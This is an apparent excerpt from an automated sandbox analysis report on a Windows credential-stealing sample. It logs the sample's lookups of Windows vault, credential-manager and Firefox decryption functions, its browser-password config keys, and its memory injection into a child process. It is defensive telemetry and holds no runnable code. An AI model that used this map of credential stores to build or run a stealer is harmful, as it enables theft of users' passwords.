| Open | c:\program files (x86)\microsoft office\heather-makeup.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows nt\variations_afraid_providing_virtual.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows nt\rear accident ibm.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\interstate.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\microsoft.net\lang rats isbn prize.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\affiliated.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\java\example-straight-cad-vc.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppsvc.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sppsvc.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\mobsync.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\microsoft shared\clicktorun\officec2rclient.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 |
Module (115)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | comctl32.dll | base_address = 0x73ed0000 |
|
1 | |
| Load | shell32.dll | base_address = 0x758a0000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x750d0000 |
|
2 | |
| Load | pstorec.dll | base_address = 0x73eb0000 |
|
1 | |
| Load | vaultcli.dll | base_address = 0x74b10000 |
|
1 | |
| Load | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | base_address = 0x73b00000 |
|
1 | |
| Load | psapi.dll | base_address = 0x75890000 |
|
1 | |
| Get Handle | private_0x0000000000400000 | base_address = 0x400000 |
|
22 | |
| Get Handle | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | base_address = 0x0 |
|
1 | |
| Get Handle | c:\program files (x86)\mozilla firefox\nss3.dll | base_address = 0x73b00000 |
|
2 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74cb0000 |
|
2 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
2 | |
| Get Filename | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | process_name = c:\windows\system32\taskhost.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | process_name = c:\windows\system32\dwm.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | process_name = c:\windows\explorer.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | process_name = c:\program files\microsoft office\root\office16\onenotem.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | process_name = c:\program files (x86)\mozilla maintenance service\villagescirclelaboratory.exe, file_name_orig = C:\Program Files (x86)\Mozilla Maintenance Service\villagescirclelaboratory.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | process_name = c:\program files (x86)\microsoft office\suffering-draw.exe, file_name_orig = C:\Program Files (x86)\Microsoft Office\suffering-draw.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | process_name = c:\program files\msbuild\wright_index_transfers_mystery.exe, file_name_orig = C:\Program Files\MSBuild\wright_index_transfers_mystery.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | process_name = c:\program files (x86)\uninstall information\kinasescoredformatsnb.exe, file_name_orig = C:\Program Files (x86)\Uninstall Information\kinasescoredformatsnb.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | process_name = c:\program files\microsoft office 15\teach-minnesota.exe, file_name_orig = C:\Program Files\Microsoft Office 15\teach-minnesota.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | process_name = c:\program files (x86)\internet explorer\teacher sectors.exe, file_name_orig = C:\Program Files (x86)\Internet Explorer\teacher sectors.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | process_name = c:\program files (x86)\mozilla firefox\th rw.exe, file_name_orig = C:\Program Files (x86)\Mozilla Firefox\th rw.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | process_name = c:\program files\windows media player\gis-mom-belly.exe, file_name_orig = C:\Program Files\Windows Media Player\gis-mom-belly.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | process_name = c:\program files\reference assemblies\madagascar.exe, file_name_orig = C:\Program Files\Reference Assemblies\madagascar.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | process_name = c:\program files (x86)\microsoft onedrive\victory nasa daughters.exe, file_name_orig = C:\Program Files (x86)\Microsoft OneDrive\victory nasa daughters.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | process_name = c:\program files\internet explorer\flower organizer george.exe, file_name_orig = C:\Program Files\Internet Explorer\flower organizer george.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | process_name = c:\program files (x86)\windows defender\scripts animals.exe, file_name_orig = C:\Program Files (x86)\Windows Defender\scripts animals.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | process_name = c:\program files (x86)\java\changes_directors_inclusion.exe, file_name_orig = C:\Program Files (x86)\Java\changes_directors_inclusion.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | process_name = c:\program files (x86)\microsoft office\heather-makeup.exe, file_name_orig = C:\Program Files (x86)\Microsoft Office\heather-makeup.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | process_name = c:\program files\windows nt\variations_afraid_providing_virtual.exe, file_name_orig = C:\Program Files\Windows NT\variations_afraid_providing_virtual.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | process_name = c:\program files (x86)\windows nt\rear accident ibm.exe, file_name_orig = C:\Program Files (x86)\Windows NT\rear accident ibm.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | process_name = c:\program files\msbuild\interstate.exe, file_name_orig = C:\Program Files\MSBuild\interstate.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | process_name = c:\program files (x86)\microsoft.net\lang rats isbn prize.exe, file_name_orig = C:\Program Files (x86)\Microsoft.NET\lang rats isbn prize.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | process_name = c:\program files\common files\affiliated.exe, file_name_orig = C:\Program Files\Common Files\affiliated.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | process_name = c:\program files (x86)\java\example-straight-cad-vc.exe, file_name_orig = C:\Program Files (x86)\Java\example-straight-cad-vc.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | process_name = c:\windows\system32\taskeng.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll | function = InitCommonControlsEx, address_out = 0x73ed6be6 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = SHGetSpecialFolderPathW, address_out = 0x758c0468 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptAcquireContextA, address_out = 0x750d91dd |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptReleaseContext, address_out = 0x750de124 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptCreateHash, address_out = 0x750ddf4e |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptGetHashParam, address_out = 0x750ddf7e |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptHashData, address_out = 0x750ddf36 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptDestroyHash, address_out = 0x750ddf66 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CredReadA, address_out = 0x751171c1 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CredFree, address_out = 0x750db2ec |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CredDeleteA, address_out = 0x75117941 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CredEnumerateA, address_out = 0x75117381 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CredEnumerateW, address_out = 0x75117481 |
|
1 | |
| Get Address | c:\windows\syswow64\pstorec.dll | function = PStoreCreateInstance, address_out = 0x73eb526c |
|
1 | |
| Get Address | c:\windows\syswow64\vaultcli.dll | function = VaultOpenVault, address_out = 0x74b126a9 |
|
1 | |
| Get Address | c:\windows\syswow64\vaultcli.dll | function = VaultCloseVault, address_out = 0x74b12718 |
|
1 | |
| Get Address | c:\windows\syswow64\vaultcli.dll | function = VaultEnumerateItems, address_out = 0x74b13099 |
|
1 | |
| Get Address | c:\windows\syswow64\vaultcli.dll | function = VaultFree, address_out = 0x74b14321 |
|
1 | |
| Get Address | c:\windows\syswow64\vaultcli.dll | function = VaultGetInformation, address_out = 0x74b124c0 |
|
1 | |
| Get Address | c:\windows\syswow64\vaultcli.dll | function = VaultGetItem, address_out = 0x74b13242 |
|
2 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = NSS_Init, address_out = 0x73bbd70b |
|
2 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = NSS_Shutdown, address_out = 0x73bbd13c |
|
2 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = PK11_GetInternalKeySlot, address_out = 0x73b53c51 |
|
2 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = PK11_FreeSlot, address_out = 0x73b53333 |
|
2 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = PK11_CheckUserPassword, address_out = 0x73b3cbc4 |
|
2 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = PK11_Authenticate, address_out = 0x73b3d3ca |
|
2 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = PK11SDR_Decrypt, address_out = 0x73b500a7 |
|
2 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = sqlite3_open, address_out = 0x73c61ca0 |
|
1 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = sqlite3_prepare, address_out = 0x73bece70 |
|
1 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = sqlite3_step, address_out = 0x73c55200 |
|
1 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = sqlite3_column_text, address_out = 0x73c0d400 |
|
1 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = sqlite3_column_int, address_out = 0x73c0d3a0 |
|
1 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = sqlite3_column_int64, address_out = 0x73c0d3d0 |
|
1 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = sqlite3_finalize, address_out = 0x73c39f60 |
|
1 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = sqlite3_close, address_out = 0x73c3bde0 |
|
1 | |
| Get Address | c:\program files (x86)\mozilla firefox\nss3.dll | function = sqlite3_exec, address_out = 0x73c3a270 |
|
1 | |
| Get Address | c:\windows\syswow64\psapi.dll | function = GetModuleBaseNameW, address_out = 0x7589152c |
|
1 | |
| Get Address | c:\windows\syswow64\psapi.dll | function = EnumProcessModules, address_out = 0x75891408 |
|
1 | |
| Get Address | c:\windows\syswow64\psapi.dll | function = GetModuleFileNameExW, address_out = 0x758913f0 |
|
1 | |
| Get Address | c:\windows\syswow64\psapi.dll | function = EnumProcesses, address_out = 0x75891544 |
|
1 | |
| Get Address | c:\windows\syswow64\psapi.dll | function = GetModuleInformation, address_out = 0x75891420 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryFullProcessImageNameW, address_out = 0x74cd15f7 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessTimes, address_out = 0x74cdd60f |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = Hardware Information |
|
1 |
Ini (28)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg | section_name = General, key_name = ShowGridLines, default_value = 0 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg | section_name = General, key_name = SaveFilterIndex, default_value = 0 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg | section_name = General, key_name = ShowInfoTip, default_value = 1 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg | section_name = General, key_name = MarkOddEvenRows, default_value = 0 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg | section_name = General, key_name = ShowTimeInGMT, default_value = 0 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg | section_name = General, key_name = LoadPasswordsIE, default_value = 1 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg | section_name = General, key_name = LoadPasswordsFirefox, default_value = 1 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg | section_name = General, key_name = LoadPasswordsChrome, default_value = 1 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg | section_name = General, key_name = LoadPasswordsOpera, default_value = 1 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg | section_name = General, key_name = LoadPasswordsSafari, default_value = 1 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg | section_name = General, key_name = LoadPasswordsSeaMonkey, default_value = 1 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg | section_name = General, key_name = LoadPasswordsYandex, default_value = 1 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg | section_name = General, key_name = UseFirefoxProfileFolder, default_value = 0 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg | section_name = General, key_name = UseFirefoxInstallFolder, default_value = 0 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg | section_name = General, key_name = UseChromeProfileFolder, default_value = 0 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg | section_name = General, key_name = UseOperaPasswordFile, default_value = 0 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg | section_name = General, key_name = FirefoxProfileFolder |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg | section_name = General, key_name = FirefoxInstallFolder |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg | section_name = General, key_name = ChromeProfileFolder |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg | section_name = General, key_name = OperaPasswordFile |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg | section_name = General, key_name = SaveFileEncoeding, default_value = 0 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg | section_name = General, key_name = WinPos |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg | section_name = General, key_name = Columns |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg | section_name = General, key_name = Sort, default_value = 0 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini | section_name = Profile0, key_name = Path, data_out = Profiles/3y2joh8o.default |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini | section_name = Profile0, key_name = IsRelative, default_value = 0 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini | section_name = Profile1, key_name = Path |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini | section_name = Profile1, key_name = IsRelative, default_value = 0 |
|
1 |
Process #17: narrowexisting.exe
45
0
| Information | Value |
|---|---|
| ID | #17 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" "C:\ProgramData\1150.tmp" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:02:41, Reason: Child Process |
| Unmonitor | End Time: 00:03:32, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:51 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbec |
| Parent PID | 0xa68 (c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B30
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x002cffff | Private Memory | Readable, Writable |
|
|
|
- |
| 5kyzze.exe | 0x00400000 | 0x00420fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000004e0000 | 0x004e0000 | 0x005dffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000005e0000 | 0x005e0000 | 0x00767fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000780000 | 0x00780000 | 0x0078ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000790000 | 0x00790000 | 0x00910fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000920000 | 0x00920000 | 0x01d1ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| wow64cpu.dll | 0x74550000 | 0x74557fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74560000 | 0x745bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x745c0000 | 0x745fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x74c20000 | 0x74c2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x74c30000 | 0x74c8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x74cb0000 | 0x74dbffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74dc0000 | 0x74eaffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75000000 | 0x750cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x750d0000 | 0x7516ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x75170000 | 0x751c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75570000 | 0x7566ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75670000 | 0x756fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x75750000 | 0x757affff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x757c0000 | 0x7585cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x758a0000 | 0x764e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x764f0000 | 0x7659bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x76830000 | 0x76839fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x76840000 | 0x76885fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x768a0000 | 0x768b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x768c0000 | 0x76a1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076cd0000 | 0x76cd0000 | 0x76deefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076df0000 | 0x76df0000 | 0x76ee9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x770d0000 | 0x7724ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #14: c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | 0x620 | address = 0x400000, size = 102400 |
|
1 | |
| Modify Memory | #14: c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | 0x620 | address = 0x7efde008, size = 4 |
|
1 | |
| Modify Memory | #14: c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | 0x620 | address = 0x7efdf010, size = 4 |
|
1 | |
| Modify Control Flow | #14: c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | 0x620 | os_tid = 0xb30, address = 0x0 |
|
1 |
Host Behavior
File (3)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Registry (3)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook | value_name = DLLPathEx, data = 67 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook | value_name = MSIApplicationLCID, data = 77 |
|
1 |
Module (37)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\system\msmapi\1033\msmapi32.dll | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74cb0000 |
|
1 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74cc4f2b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74cc359f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74cc1252 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74cc4208 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74cc4d28 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74d4410b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74d44195 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74ccd31f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74cdee7e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x7711441c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x7713c50e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x7713c381 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74cdf088 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x771205d7 |
|
1 | |
